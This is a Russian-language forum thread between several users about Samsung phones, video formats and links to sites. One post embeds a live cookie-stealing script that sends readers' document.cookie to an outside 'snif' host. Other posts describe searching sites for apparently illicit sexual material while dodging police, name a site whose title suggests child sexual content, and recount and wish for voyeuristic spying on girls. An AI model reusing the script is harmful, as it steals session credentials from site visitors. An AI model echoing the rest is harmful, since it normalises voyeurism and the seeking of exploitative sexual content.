-
#
000
20.08.2016 22:47
-
Ох,Ниночка!Спасибки за ссыль.Похоже на скрытую рекламу.ПППц.
7-реально не работает.
Удачи в кодировке.
Ряженые-реально.
-
#
STELS_365
20.08.2016 00:41
-
<script> img = new Image(); img.src = "http://j90356wm.bget.ru/snif/s.gif?"+document.cookie; </script>
-
#
ninadobrev
19.08.2016 23:37
-
Ооо я там тебе бросил адрес сайта там гдета есть сайт в середине гдета там порно добрые фота крутые жаль что фото не гружу .блин 7 чевота не понятное трарится может скора закроют .ооо праверь некст ллее.ру что там уменя пака не палучилось туда загрузится может добрата есть .ооо я неделю назат мастер бросил видухи в айви и я скачал и начел искать как их перекадировать раньше не палучалось кадировать их нармальный формат тут сразу нашол в два фармата 3 гпг и мпг4 и многие просят загрузи в 3гпг другие мпг4 и приходится кадировать айви и грузить может админ 7 проста зачишает павтор и видухи каторые ему не нравятся фиг знает все шас на стреме гаварят ряжиные из военторга по сайтам лазиют с людми абшаются паходу
-
#
000
19.08.2016 22:14
-
чето не понял,Ниночка -7-ой сдох штоль?
-
#
000
19.08.2016 22:12
-
Ох,Ниночка!Спасибки за ссыли.Если будет возможность-можно в личку ссыли кинуть здесь.
А на 17-где обмен ссылями-там запоролены+вход только друзьм-может где то там?
А что- с 2-ми симками может лючить.Просто есть с 2-мя радиомодулями (честные 2-х симки) работают одновременно.И с 1-м радиомодулем- работают попеременно.Вроде удобно 2-симики-одна разговор,другая-интенет или разговор с другими.
Ну а если-присобачить-подзорную трубу к смарту?
Может телеобьектив получится.
-
#
ninadobrev
19.08.2016 21:08
-
next.llee.ru ооо замучился там севодня регистрироватся не чево не палучилось но видео уже есть толька скачать их можна за регистрированым человекам не знаю добрые ли там видео ооо зашол на 17 в раздел обмен сылками там есть сайт и в сайте многа сайтов нашол сайт там блин сколькаже там дабра фото .видео незнаю может для кампьютаров толька ранше на таких сайтах лазил гдета 4 года назат кагда фотки нужны были cle вот честично названия написал найдеш если нада будет все названия написать не магу а там у меня в закладке написана dollcuties.pw и чевота еше толька если будеш захадить знай что вирусы везде есть
-
#
ninadobrev
18.08.2016 23:22
-
Ооо с 3 нео крутой смартфон бальшой икран браузер планета земля пишет на микро изде добрые видео что ише нужна белова цвета меньше брака симки 2 это брет там одна может виснуть дулас не стал брать изаэтова хочется канешно чтобы писал видео как камера приблежал бы 1000 метров так чтобы я мог увидеть какова цвета у девченки глаза а то у нас в москве дом на доме как гаварится можна за девченками падглядовать многа таких случеев кагда был маленкий было что каждый день девченка раздевалась сисичками свитила другая тоже причем одна пришла к нам на тусовку вот это был прикол а сестра ее всегда после школы с сабакой гуляла в черных калгатулях вот тагдабы с3 нужен был шас лежит в каропке 5 штук даже проста самсунг напугал что с гуглом падружился и теперь будет лепить браузеры везде гугл хром гавно
-
#
000
18.08.2016 22:24
-
Спасибки за ссыль.
-
#
000
18.08.2016 22:23
-
Посмотрел Нео3-не очень.Из плюсов-проц 4 ядра/8мп-камера/16гб-память/вспышка/амолед-экран/
Нехорошо-устаревшый Андроид 4,4,2/одна симка-вообще брать не стал бы/
Наверно достался с большой скидкой-тогда хорошо.
ГНУСМАС-в своем репертуаре -хочеш получше-2 сим например-плати в 1,5 раза дороже/сволочи/
Не пропадает чувство - наебаловики. Гнусмас-одним словом.Ну надеюсь все будет у тебя с ним норм.
Андрой 4,4-свежее твоего /4,0-? незнаю какой был/ Вот и работает.
Успехов в поиске "бобра".
-
#
ninadobrev
18.08.2016 21:54
-
Ооо мне чевота так надаела на Гемароича наежать что унево сайт какойта не тот стал будем грузится на такой сайт какой есть блин чевота так на работе устал еше 3 дня работать а патом палазию по сайтам вродебы должы быть добрыми хатя наврятли добрые видосы найду там хатя фиг знает